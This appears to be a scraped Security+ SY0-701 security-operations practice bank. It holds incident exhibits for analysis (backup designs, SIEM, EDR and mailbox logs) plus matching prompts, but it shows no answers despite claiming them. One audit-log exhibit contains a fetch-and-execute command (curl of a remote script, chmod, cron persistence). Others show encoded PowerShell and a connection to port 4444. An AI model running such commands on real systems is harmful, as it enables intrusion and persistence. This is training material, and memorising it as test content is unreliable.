SY0-701 Security Operations • Complete Question Bank
Complete SY0-701 Security Operations question bank — all 0 questions with answers and detailed explanations.
Disaster recovery review for the customer billing platform Current backup design: - Full backup once per day at 23:00 - Backups stored on the same storage cluster as production VM snapshots - Backup administrator account is shared by the operations team - Restore test cadence: none in the last 12 months - Current measured restore time from bare metal: 7 hours Business recovery targets: - RTO: 2 hours - RPO: 15 minutes
Based on the exhibit, what is the most likely SOC conclusion and next action?
A scheduled alert fired on a server that repeatedly connects to a vendor update site at fixed intervals. The security team wants to know whether the alert represents a real threat or a harmless operational pattern.
10:00:02 patch-srv-12 service 'AcmePatchAgent' started by NT AUTHORITY\SYSTEM 10:00:05 patch-srv-12 DNS query: updates.acmecorp.com -> 198.51.100.44 10:00:05 patch-srv-12 outbound TLS connection to 198.51.100.44:443 10:00:07 SIEM rule 'possible beaconing every 15 minutes' triggered 10:15:03 patch-srv-12 DNS query: updates.acmecorp.com -> 198.51.100.44 10:15:03 patch-srv-12 outbound TLS connection to 198.51.100.44:443 10:15:04 EDR metadata: process hash matches approved vendor signature CMDB: Asset group = Patch Management Server; maintenance window = daily 10:00-10:30
Server: HR-APP02 Finding: Outdated OpenSSL library with a critical remotely exploitable weakness Vendor status: Fix unavailable for 21 days Exposure: The service must remain online Current access: host firewall allows TCP 443 from any source Monitoring: Monthly vulnerability scans only Available controls: reverse proxy, WAF, IP allow lists, jump host for administration
ERP database protection summary: - Required RTO: 2 hours - Required RPO: 15 minutes - Current backup schedule: * Full backup every Sunday at 01:00 * Differential backup daily at 01:00 * Transaction log backup every 30 minutes - Estimated restore time from backup media: 90 minutes after media is available - No standby server exists - Restore testing occurs once per year
Backup status for the billing application Current design: - Nightly full backup at 01:00 - Backup repository: NAS-BACKUP01 - NAS-BACKUP01 is joined to the same Active Directory domain as production servers - Backup share is mounted over SMB from the production network - Last restore test: 5 months ago, failed due to permissions error Business targets: - RTO: 4 hours - RPO: 30 minutes
Based on the exhibit, what is the most likely conclusion after correlating the logs?
A configuration-management task ran from a jump host and generated repeated login alerts on target servers. The SOC wants to determine whether this is malicious activity or approved automation.
Change window: approved 01:00-02:00 01:11:44 jump01 ssh to appsrv02 as configsvc from 10.1.10.20 01:11:47 jump01 ssh to appsrv03 as configsvc from 10.1.10.20 01:12:01 appsrv02 auth.log 2 failed password attempts for configsvc, then success with SSH key 01:12:04 appsrv03 auth.log 1 failed password attempt for configsvc, then success with SSH key 01:12:10 SIEM rule 'brute force against privileged account' triggered CMDB / automation note: configsvc is restricted to Ansible playbooks launched only from jump01 during maintenance windows
Based on the exhibit, what is the best immediate action for the SOC or IR team?
A finance workstation shows evidence of a macro-launched script, followed by file renaming and lateral SMB traffic to two other hosts. The team has not yet determined the full scope of the incident.
Host: finance-lap07 10:22:11 winword.exe spawned powershell.exe -enc <redacted> 10:22:14 powershell.exe created C:\Users\ana\AppData\Roaming\rclone.exe 10:24:02 file rename activity: 184 files changed to *.locked 10:24:09 outbound SMB connections to 10.20.4.18 and 10.20.4.19 10:25:01 EDR status: endpoint still connected to corporate VPN User report: 'My shared files stopped opening and the folder names changed.'
Linux server audit summary: APP-SRV14 10:22:13 sshd: Accepted publickey for appsvc from 10.5.14.22 10:23:01 sudo: appsvc ran /usr/bin/curl https://198.51.100.44/p.sh -o /tmp/.x 10:23:09 sudo: appsvc ran chmod +x /tmp/.x 10:23:11 /tmp/.x created /etc/cron.d/.maint 10:23:20 /etc/ssh/sshd_config modified to allow PasswordAuthentication yes 10:24:02 outbound traffic blocked by segmentation rule IR note: host is isolated, disk image has not been taken yet, and the business wants the service restored today
Network and endpoint logs for workstation WS-204 10:12:08 DNS query from WS-204 to 10.20.1.15 for wpad.corp.local 10:12:09 HTTP request from WS-204 to 10.20.1.15 for /wpad.dat 10:12:10 Proxy auto-detect enabled in browser policy 10:12:11 Traffic from WS-204 now exits through proxy 10.20.1.15 Asset inventory: - 10.20.1.15 = CORP-PROXY01 - CORP-PROXY01 is listed as the approved outbound web proxy
Based on the exhibit, which issue should be remediated first by the operations team?
A small company has limited maintenance windows and can address only one of several findings this week.
Weekly vulnerability report: 1. vpn-gw01 - Exposure: Internet-facing - Finding: Critical remote code execution - Notes: Vendor patch available; reboot required 2. db-lab02 - Exposure: Internal only - Finding: High-severity authentication bypass - Notes: Isolated lab subnet; no sensitive data; no route to production 3. printsrv03 - Exposure: Internet-facing administrative portal - Finding: Medium-severity outdated firmware - Notes: Vendor has not released a fix yet; temporary ACL blocks the admin port from the internet
A vulnerability dashboard shows four new findings. Which one should be remediated first by the operations team?
- A low-severity issue on an offline lab VM - A medium-severity issue on a payroll server with no known exploit - A critical issue on an internet-facing web server with an available exploit - A high-severity issue on a test workstation that is not domain joined
Based on the exhibit, what is the best eradication decision after containment?
A quarantined endpoint was found to have a malicious startup item and a scheduled task. The team has already isolated it from the network and preserved memory for analysis.
Host: eng-lt-44 Containment status: network quarantined Registry artifact: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater = C:\Users\maria\AppData\Roaming\update.exe Scheduled task: TaskName: SysMaint Action: C:\Users\maria\AppData\Roaming\update.exe /svc Trigger: every 30 minutes File hash: update.exe SHA256 matches known malware family 'QuillDoor' User impact: - Browser pop-ups observed earlier - No confirmed encryption - No evidence of additional hosts compromised
Prioritized vulnerability review Asset Severity Exposure Notes --------------------------------------------------------------- VPN-EDGE01 Critical Internet-facing Remote code execution; exploit proof-of-concept publicly available FILE-02 High Internal file server SMB service outdated; only reachable from corp subnet TEST-VM-17 High Isolated test network No route from production; development team owns it PRINTER-3F Medium Office user VLAN Default admin credentials; management interface reachable via HTTP
Microsoft 365 audit trail for user amaya@corp.example: 09:41 User clicked link from external message and signed into a lookalike portal 09:42 OAuth consent granted to app 'ExpenseReport-Helper' scopes=Mail.Read, offline_access, User.Read 09:44 Inbox rule created: if subject contains 'invoice' then forward to finance-relay@external.example 09:46 Refresh token issued from unfamiliar IP 203.0.113.88 09:51 Admin deleted inbox rule 09:52 Password changed successfully
Based on the exhibit, which change best improves both recovery time and recovery point for the ERP database?
A mid-sized company has a two-hour RTO and a 30-minute RPO, but its current backup design cannot meet either objective during restore testing.
System: ERP database cluster Business requirements: - RTO = 2 hours - RPO = 30 minutes Current recovery design: - Nightly full backup at 23:00 to onsite NAS - Differential backup at 12:00 - Weekly copy replicated to cloud on Sundays Restore test results: - Cold rebuild of VM + database restore: 5 hours 40 minutes - Data gap since last backup: 2 hours 18 minutes - NAS is online and joined to the same domain as production servers
DNS telemetry for host LAP-09: 10:14:02 query=TXT name=k7f3a9d1a.reporting-updates.net client=10.1.8.44 10:15:02 query=TXT name=m2b8c4.reporting-updates.net client=10.1.8.44 10:16:02 query=TXT name=q9z1x7.reporting-updates.net client=10.1.8.44 10:17:02 query=TXT name=t4n8p2.reporting-updates.net client=10.1.8.44 Packet summary: 58-byte UDP responses, repeated every 60 seconds Proxy logs: no HTTP or HTTPS sessions to reporting-updates.net EDR: python.exe launched by signed pdf reader, process exited in 3 seconds EDR network telemetry: same pattern continued after the document closed
EDR timeline - WS-224 11:07 User opened invoice.docm 11:08 winword.exe spawned powershell.exe -enc <redacted> 11:09 PowerShell created C:\ProgramData\updater.vbs 11:10 Scheduled task 'UpdaterSvc' created to run at logon 11:12 Outbound connection blocked to 203.0.113.77:8443 11:14 Host isolated from the network 11:16 Memory capture completed Analyst note: The workstation was used for finance approvals during the last hour. No other hosts have shown the same indicators yet.
Current backup design: - Production file server backs up nightly at 23:00 to NAS-Backup over SMB. - NAS-Backup is mounted read/write to the file server 24x7. - Weekly copy job replicates NAS contents to cloud object storage. - Backup credentials are shared with the server admin group. - Last restore test: 14 months ago. Incident summary: - Ransomware encrypted production files and then encrypted the NAS share using the same credentials.
Email security investigation for user amiller - User submitted credentials on a fake sign-in page at 08:22 - Password was reset at 08:35 - Active sessions were revoked at 08:36 - Mailbox audit now shows: * Inbox rule: 'FinanceDocs' forwards any message with 'invoice' to external address redacted@proton.example * OAuth consent granted to unknown application 'QuickDocs Sync' * Deleted Items folder contains no suspicious messages Help desk confirms the user still has access to the mailbox after reset.
Match each incident response activity to the phase of the incident response lifecycle it best represents. Use each option once.
1. A SOC analyst disables a compromised account, isolates the workstation from the network, and preserves volatile evidence. 2. The team images the infected system, removes the malicious persistence mechanism, and patches the exploited vulnerability. 3. After restoring services, the team reviews timeline gaps, detection delays, and control failures with management. 4. Before the attack occurs, the team verifies contact lists, playbooks, escalation paths, and backup credentials. 5. The team confirms suspicious authentication logs, endpoint alerts, and unusual outbound traffic indicate an active compromise.
Drag a concept onto its matching description — or click a concept then click the description.
Containment
Eradication
Lessons learned
Preparation
Identification
Data Room Environmental Sensor Log 10:15 Humidity: 82% 10:16 Leak Sensor Under Rack 7: Dry 10:17 Leak Sensor Under Rack 7: Wet 10:18 Water Detected Under Raised Floor Facilities Note: 'Condensation forms on the chilled-water pipe during humid afternoons.'
Windows Task Scheduler Settings Task Name: DailyLogArchive Run As: Administrator Trigger: Daily at 01:00 Action: powershell.exe -File C:\Scripts\Archive.ps1 Security Options: 'Run only when user is logged on' = Enabled Note: The script only copies logs to a shared archive location.
Email Security Gateway Queue Message ID: 77129 From: vendor.billing@example.net Subject: Updated invoice for Q4 Attachment: invoice_q4.xlsm Attachment Type: Macro-enabled spreadsheet Static Scan Result: No signature match Dynamic Analysis Status: pending Policy Action: hold for review
Facility Access Log Location: Records Room Door 3 08:11 Badge ID 1441 Granted 08:11 Door Opened 08:12 Door Held Open Alarm Cleared 08:12 Badge ID 1441 Granted 08:12 Door Opened Camera Note: 'Unknown person followed employee through the door.'
Backup Status Report System: File Server FS-03 Nightly Backup Job: SUCCESS Backup Sets Retained: 14 Last Successful Job: 02:00 today Last Restore Test: 118 days ago Note: No recent validation of file recovery has been recorded.
Evidence Receipt Form Case: 24-1187 Item: 4A Description: SSD from workstation WS-14 Acquisition Method: Bit-for-bit image created with write blocker Source SHA-256: 9e8f1a7c4c0d2f1b... Image SHA-256: not yet calculated Chain of Custody: pending analyst verification
EDR Alert Summary Host: FIN-LT-22 Severity: High Detection: Suspicious PowerShell with encoded command Parent Process: winword.exe Network Activity: outbound connection to 203.0.113.77:4444 User Note: 'The laptop is running very slowly and pop-ups started after opening an attachment.'
Drag a concept onto its matching description — or click a concept then click the description.
Check whether the pattern matches password spraying across accounts rather than a brute-force attempt on one user.
Pivot to parent-child process trees and script-block telemetry on the endpoint.
Compare the query pattern and periodicity for possible DNS tunneling or beaconing.
Correlate with scheduled tasks, recent file creation, and account activity for staging or exfiltration.
Review token/session logs and conditional-access telemetry to see whether a hijacked session or relay attack occurred.
Drag a concept onto its matching description — or click a concept then click the description.
Investigate possible script-based malware execution launched through a document
Check for suspicious domain lookups that may indicate command-and-control activity
Look for beaconing behavior from a potentially compromised endpoint
Assess for stolen credentials or credential-stuffing activity
Drag a concept onto its matching description — or click a concept then click the description.
Use a phased rollout to catch compatibility issues early
Provide a rollback or backout plan if the patch fails
Place the work inside a maintenance window
Create a baseline that supports recovery and comparison
Apply change control and obtain approval
Drag a concept onto its matching description — or click a concept then click the description.
Contain the incident and limit spread to other systems
Preserve evidence that could disappear after power-off
Eradicate persistence and return the system to a trusted state
Recover business operations and return service to normal
Complete lessons learned and improve future response
Drag a concept onto its matching description — or click a concept then click the description.
Living-off-the-land or fileless malware execution
DNS tunneling or command-and-control beaconing
Password spraying or credential stuffing that succeeded
Compromised privileged credentials with persistence and post-exploitation activity
Drag steps to the numbered slots on the right, or tap a step then tap a slot.
Drag steps to the numbered slots on the right, or tap a step then tap a slot.